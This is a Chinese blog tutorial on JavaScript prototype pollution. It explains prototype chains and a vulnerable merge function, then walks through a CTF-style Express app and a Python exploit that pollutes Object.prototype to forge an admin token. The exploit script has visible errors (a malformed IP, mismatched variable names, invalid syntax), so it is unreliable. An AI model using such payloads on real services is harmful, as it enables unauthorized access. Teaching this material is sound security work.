原型链污染分析

最新推荐文章于 2024-11-02 12:42:04 发布
最新推荐文章于 2024-11-02 12:42:04 发布
阅读量321 收藏
点赞数
分类专栏: js 安全 文章标签: javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56845076/article/details/132090088
版权
安全 同时被 2 个专栏收录
7 篇文章 0 订阅
订阅专栏
js
2 篇文章 0 订阅
订阅专栏

原型链污染问题

原型链

原型的继承

先创建一个对象,查看一下属性

const obj = { prop1: 111, prop2: 222,}

在这里插入图片描述
这里的Object.prototype就是对象的原型。
原型里面有许多的属性,这里面的constructor是我们需要着重关注的。
除此之外还有一个,__proto__也需要关注。

关于protopype和__proto__的关系,我们一看便知。
在这里插入图片描述
这里的obj我们可以理解为实例对象,Object可以理解为构造函数,两者有这样的关系,用图来解释一下就是:
在这里插入图片描述
所以,prototype、__proto__、constructor的关系有个大致了解。

原型链污染

原型链的污染,就是通过prototype来实现的。
举个例子:

构造函数的一个方法,或者一个属性
function Animal(name) {
  this.name = name;
}
Animal.prototype.color = 'white';

var cat1 = new Animal('大毛');
var cat2 = new Animal('二毛');

cat1.color // 'white'
cat2.color // 'white'

这里的cat本身并不具有颜色的属性,但是因为原型链的改变,而带有该属性,这就是原型链污染的基础

上面的比较简单,我们进阶一下。

function merge(target, source) {
    for (let key in source) {
        if (key in source && key in target) {
            merge(target[key], source[key])
        } else {
            target[key] = source[key]
        }
    }
}

merge是合并的意思,分析可知,在source中的属性,如果target中没有,便会赋值进去,使得target也获得。

那就实现一下,进行一下原型链的污染操作,如果此时传入的属性,存在__proto__,将会产生污染。

let o1 = {}
let o2 = {a: 1, "__proto__": {b: 2}}
merge(o1, o2)
console.log(o1.a, o1.b)

o3 = {}
console.log(o3.b)

在这里插入图片描述
合并成功了,但是污染,却没有完成,这个原因是这样的:这是因为,我们用JavaScript创建o2的过程(let o2 = {a: 1, "__proto__": {b: 2}})中,__proto__已经代表o2的原型了,此时遍历o2的所有键名,你拿到的是[a, b]__proto__并不是一个key,自然也不会修改Object的原型。

所以我们需要修改代码。

let o2 = JSON.parse('{"a": 1, "__proto__": {"b": 2}}')

再查看一下。
在这里插入图片描述
原型链污染完成了。

既然我们已经有了简单的了解,那不妨再进阶一下。

const express = require('express')
var hbs = require('hbs');
var bodyParser = require('body-parser');
const md5 = require('md5');
var morganBody = require('morgan-body');
const app = express();
var user = []; //empty for now

var matrix = [];
for (var i = 0; i < 3; i++){
    matrix[i] = [null , null, null];
}

function draw(mat) {
    var count = 0;
    for (var i = 0; i < 3; i++){
        for (var j = 0; j < 3; j++){
            if (matrix[i][j] !== null){
                count += 1;
            }
        }
    }
    return count === 9;
}

app.use(express.static('public'));
app.use(bodyParser.json());
app.set('view engine', 'html');
morganBody(app);
app.engine('html', require('hbs').__express);

app.get('/', (req, res) => {

    for (var i = 0; i < 3; i++){
        matrix[i] = [null , null, null];

    }
    res.render('index');
})


app.get('/admin', (req, res) => { 
    /*this is under development I guess ??*/
    console.log(user.admintoken);
    if(user.admintoken && req.query.querytoken && md5(user.admintoken) === req.query.querytoken){
        res.send('Hey admin your flag is <b>flag{prototype_pollution_is_very_dangerous}</b>');
    } 
    else {
        res.status(403).send('Forbidden');
    }    
}
)


app.post('/api', (req, res) => {
    var client = req.body;
    var winner = null;

    if (client.row > 3 || client.col > 3){
        client.row %= 3;
        client.col %= 3;
    }
    matrix[client.row][client.col] = client.data;
    for(var i = 0; i < 3; i++){
        if (matrix[i][0] === matrix[i][1] && matrix[i][1] === matrix[i][2] ){
            if (matrix[i][0] === 'X') {
                winner = 1;
            }
            else if(matrix[i][0] === 'O') {
                winner = 2;
            }
        }
        if (matrix[0][i] === matrix[1][i] && matrix[1][i] === matrix[2][i]){
            if (matrix[0][i] === 'X') {
                winner = 1;
            }
            else if(matrix[0][i] === 'O') {
                winner = 2;
            }
        }
    }

    if (matrix[0][0] === matrix[1][1] && matrix[1][1] === matrix[2][2] && matrix[0][0] === 'X'){
        winner = 1;
    }
    if (matrix[0][0] === matrix[1][1] && matrix[1][1] === matrix[2][2] && matrix[0][0] === 'O'){
        winner = 2;
    } 

    if (matrix[0][2] === matrix[1][1] && matrix[1][1] === matrix[2][0] && matrix[2][0] === 'X'){
        winner = 1;
    }
    if (matrix[0][2] === matrix[1][1] && matrix[1][1] === matrix[2][0] && matrix[2][0] === 'O'){
        winner = 2;
    }

    if (draw(matrix) && winner === null){
        res.send(JSON.stringify({winner: 0}))
    }
    else if (winner !== null) {
        res.send(JSON.stringify({winner: winner}))
    }
    else {
        res.send(JSON.stringify({winner: -1}))
    }

})
app.listen(3000, () => {
    console.log('app listening on port 3000!')
})

这个代码就是非常长了,需要我们认真分析。
我们要明确我们要拿到什么,flag
获取flag的条件是 传入的querytoken要和user数组本身的admintoken的MD5值相等,且二者都要存在。
由代码可知,全文没有对user.admintokn 进行赋值,所以理论上这个值时不存在的,但是下面有一句赋值语句:

matrix[client.row][client.col] = client.data

根据原型链污染,我们要想到,这里的client.row应该就是__proto__,这里的client.col需要再分析一下,admintoken我们可以尝试填入这里,querytoken直接传入即可。
尝试一下:

import requests
import json

ur11 = "http://127.0..1:3000/api"
ur12="http://127.0.0.1:3000/admin?querytoken=a3c23537bfc1e2da4a511661547d65fb"

s = requests.session()

headers = {"Content-Type":"application/json"}
data1 = ["row":" __proto__ ","col": "admintoken","data":"sunsec"]
res1 = s.post(url1,headers=headers,data = json.dumps(data1))
res2 = s.get(ur12)

print res2.text
线粒体2.0
关注
专栏目录
Kibana未授权访问漏洞记录(CVE-2019-7609,Kibana的RCE,原型链污染,端口:5601)
墨痕诉清风的博客
11-12 5301
漏洞描述 Kibana 为 Elassticsearch 设计的一款开源的视图工具。其5.6.15到6.6.1之间的版本中存在一处原型链污染漏洞,利用这个漏洞我们可以在目标服务器上执行任意JavaScript代码。 漏洞复现 环境启动后,访问 http://your-ip:5601 即可看到Kibana页面。 原型链污染发生在“Timeline”页面,我们填入如下Payload: 创建文件 .es(*).props(label.__proto__.env.AAAA='require("chil
原型链污染
qq_53142368的博客
06-07 220
首先深入了解javascript 1,JavaScript一切皆对象, 2,对象都有一个__proto__属性,指向它的类的``prototype` 3,类是通过函数来定义的,定义的这个函数又是这个类的constructor属性值 4,每个构造函数constructor都有一个原型对象prototype 5,JavaScript使用prototype链实现继承机制 6,子类是可以通过prototype链修改其父类属性,以及爷爷类的属性值的 原型链污染 ......
【网络安全系列】JavaScript原型链污染攻击总结
读万卷书,行万里路。
03-13 2110
文章目录0 前言1 原理2 利用 0 前言 原型链污染,是 NodeJs 中常见的漏洞,在做 antCTF 时也遇到的原型链污染题目,在此记录自己学习原型链污染的过程。 1 原理 0x01 问:原型链有什么作用? 用来做继承,也就是基于原有的代码做一定的修改。下面是一个使用原型链实现继承的案例: function Parent () { this.name = 'kevin'; } Parent.prototype.getName = function () { console.log(t
简单介绍原型链污染
qq_51770207的博客
09-15 1195
快速了解什么是原型链污染
原型污染
Travelling1006的专栏
07-11 246
定义 在一个应用中,如果攻击者控制并修改了一个对象的原型,那么将可以影响所有和这个对象来自同一个类、父祖类的对象。这种攻击方式就是原型污染。 示例 let foo = {bar: 1} console.log(foo.bar) //输出1 foo.__proto__.bar = 2 //更改foo的原型,即Object let zoo = {} console.log(zoo.bar)...
渗透攻击漏洞之——原型链污染
weixin_51525416的博客
08-02 3893
JavaScript 中所有的对象都有一个内置属性,称为它的prototype(原型)。它本身是一个对象,故原型对象也会有它自己的原型,逐渐构成了原型链原型链终止于拥有null作为其原型的对象上。指向对象原型的属性并不是prototype。它的名字不是标准的,但实际上所有浏览器都使用__proto__。访问对象原型的标准方法是 Object.getPrototypeOf()。JavaScript 规定,所有对象都有自己的原型对象(prototype)。
【web安全】Nodejs原型链污染分析
「 虚幻私塾」
02-14 870
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 Nodejs原型链污染分析 什么是js原型? 可以将js原型理解为其他OOP语言中的类,但还是有细微区别。 1. function F(){...} 2. var f = new F(); 分析: 1.创建一个func F,同时创立了一个F对象(该对象默认是接着Object的原
【技术分享】从浅入深 Javascript 原型链原型链污染 .pdf
09-05
本文将深入探讨JavaScript原型链的工作原理及其可能导致的安全问题——原型链污染。 首先,JavaScript 中的对象继承并不像传统面向对象语言那样基于类,而是通过原型链机制。每个对象都有一个内部属性`[[Prototype]...
Nodejs原型链污染
发果叁
03-31 306
有一些人在学习JavaScript时会分不清Nodejs和JavaScript之间的区别,如果没有node,那么我们的JavaScript代码则由浏览器中的JavaScript解析器进行解析。几乎所有的浏览器都配备了JavaScript的解析功能(最出名的就是google的v8), 这也是为什么我们能在f12中直接执行JavaScript的原因。而Nodejs则是由这个解析器单独从浏览器中拿出来,并进行了一系列的处理,最后成为了一个可以在服务端运行JavaScript的环境。
JavaScript 原型链和继承面试题
木木木森林
10-29 3287
JavaScript 原型链和继承问题 JavaScript 中没有类的概念的,主要通过原型链来实现继承。通常情况下,继承意味着复制操作,然而 JavaScript默认并不会复制对象的属性,相反,JavaScript只是在两个对象之间创建一个关联(原型对象指针),这样,一个对象就可以通过委托访问另一个对象的属性和函数,所以与其叫继承,委托的说法反而更准确些。 原型 当我们 new 了一个新的对象实例,明明什么都没有做,就直接可以访问 toString 、valueOf 等原生方法。那么这些方法是从哪里来的
安全基础 --- 原型链污染
weixin_62443409的博客
09-05 6870
prototype:一个类的属性,所有类对象在实例化的时候会拥有prototype中的属性和方法__proto__:一个对象的__proto__属性,指向这个对象所在的类的prototype属性如果攻击者控制并修改了一个对象的原型,那将可以影响所有和这个对象来自同一个类、父类的对象,这种攻击方式就是原型链污染
用前端原型链漏洞污染拿下了服务器
程序员成长指北
07-12 522
大厂技术高级前端Node进阶点击上方程序员成长指北,关注公众号回复1,加入高级Node交流群作为前端开发者,某天偶然遇到了原型链污染漏洞,原本以为没有什么影响,好奇心驱使下,抽丝剥茧,发现原型链污染漏洞竟然也可以拿下服务器的shell管理权限,不可不留意!某天正奋力的coding,机器人给发了这样一条消息查看发现是一个叫“原型链污染”(Prototype cha...
JavaScript原型链污染攻击
BerL1n
07-18 7315
在理解攻击方法之前先了解一下js的面向对象编程的特点。 由于js非常面向对象的编程特性,js有很多神奇的操作。 在js中你可以用各种方式操作自己的对象。 0x01 prototype和__proto__分别是什么? JavaScript中,我们如果要定义一个类,需要以定义“构造函数”的方式来定义: function Foo() { this.bar = 1 } new Foo() ...
CesiumJS 案例 P12:添加指定长宽的图片图层并居中显示(圆点分别为图片图层的中心点、左上角顶点、右上角顶点、左下角顶点、右下角顶点)
weixin_52173250的博客
10-30 1121
CesiumJS 案例 P12:添加指定长宽的图片图层并居中显示(圆点分别为图片图层的中心点、左上角顶点、右上角顶点、左下角顶点、右下角顶点)
JavaScript 生成二维码
最新发布
qq_30049249的博客
11-02 92
我试过了,这一款js库支持中英文混合。进入网站后,可以直接点击运行哟~
基于vue框架的的汇生活家居商城的设计与实现bdjlq(程序+源码+数据库+调试部署+开发环境)系统界面在最后面。
h2345678的博客
10-29 1355
项目功能:商品分类,商品信息,用户。
JavaScript中this的指向和改变this指向的方法 - 2024最新版前端秋招面试短期突击面试题【100道】
everfoot的博客
10-29 669
了解this的工作原理是掌握JavaScript的关键之一,特别是在编写复杂的应用程序时。正确使用this可以避免许多常见的问题和错误。在实际开发中,合理选择不同的绑定方法,可以让你的代码更加灵活和易于维护。掌握这些this的知识点将帮助你在前端面试中脱颖而出!祝你顺利上岸!
echarts 遍历多个图表,并添加resize缩放
licongmingli的博客
10-30 221
遍历echarst多个图表,并添加独立的缩放函数
JavaScript原型污染攻击:深入NodeJS应用安全分析
- **魔术属性** JavaScript有一些特殊的魔术属性,如`__proto__`,用于访问或修改对象的原型链。 **易受攻击的库** - **对象递归合并** 如`hoek`、`lodash`、`merge`等库的合并功能可能被利用进行原型污染。 - **按...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

线粒体2.0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值